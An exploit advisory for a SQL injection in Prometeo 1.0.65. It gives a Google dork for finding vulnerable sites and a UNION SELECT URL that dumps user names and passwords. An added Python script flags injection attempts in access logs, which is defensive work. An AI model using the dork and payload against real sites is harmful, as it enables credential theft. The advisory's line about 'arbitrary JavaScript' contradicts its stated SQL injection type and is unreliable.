Prometeo 1.0.65 – SQL Injection

  • Author: Lord Tittis3000
    Date: 2010-08-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14806/
    =================================
    Prometeo (vers. 1.0.65) - SQLi Vulnerability
    =================================
    
    -Vulnerability ID: LD3
    -Product: Prometeo
    -Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)
    -Vulnerability Type: SQL Injection
    -Status: Unfixed
    -Risk level: High
    -Credit: Network Security (http://www.netw0rksecurity.net/)
    
    -Vulnerability Details: A user can execute arbitrary JavaScript code within the vulnerable application. An attacker can use a browser to exploit this vulnerability.
    
    -Google Dork: inurl:categoria.php?ID= comune
    
    -Example: 
    http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
    
    # Netw0rkSecurity.net [2010-08-26]
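
A defensive check for the injection point above, as an added example (not part of the original advisory or of the Prometeo code base): it scans web-server access logs for requests to `categoria.php` whose `ID` value is not a plain integer. The log lines are constructed, and the assumption that legitimate `ID` values are always numeric is inferred from the `ID=132` in the example URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Aug/2010:10:01:02 +0200] "GET /categoria.php?ID=132 HTTP/1.1" 200 5120
203.0.113.9 - - [26/Aug/2010:10:01:07 +0200] "GET /categoria.php?ID=132%20and%201=2%20union%20select%201,2,3%20from%20users-- HTTP/1.1" 200 812
203.0.113.9 - - [26/Aug/2010:10:01:09 +0200] "GET /categoria.php?ID=7%27 HTTP/1.1" 500 0
198.51.100.4 - - [26/Aug/2010:10:02:00 +0200] "GET /index.php?ID=abc HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ID is a non-empty run of ASCII digits.
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_requests(log_text, script="/categoria.php", param="ID"):
    """Return (client, decoded_value) pairs where `param` is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue  # a different script; out of scope for this check
        # parse_qs percent-decodes the value, so %20/%27 obfuscation is undone
        # before the allowlist comparison.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: non-numeric ID -> {value!r}")
```

Access logs record only the query string, so parameters sent in a POST body need the same allowlist check at the application or WAF layer.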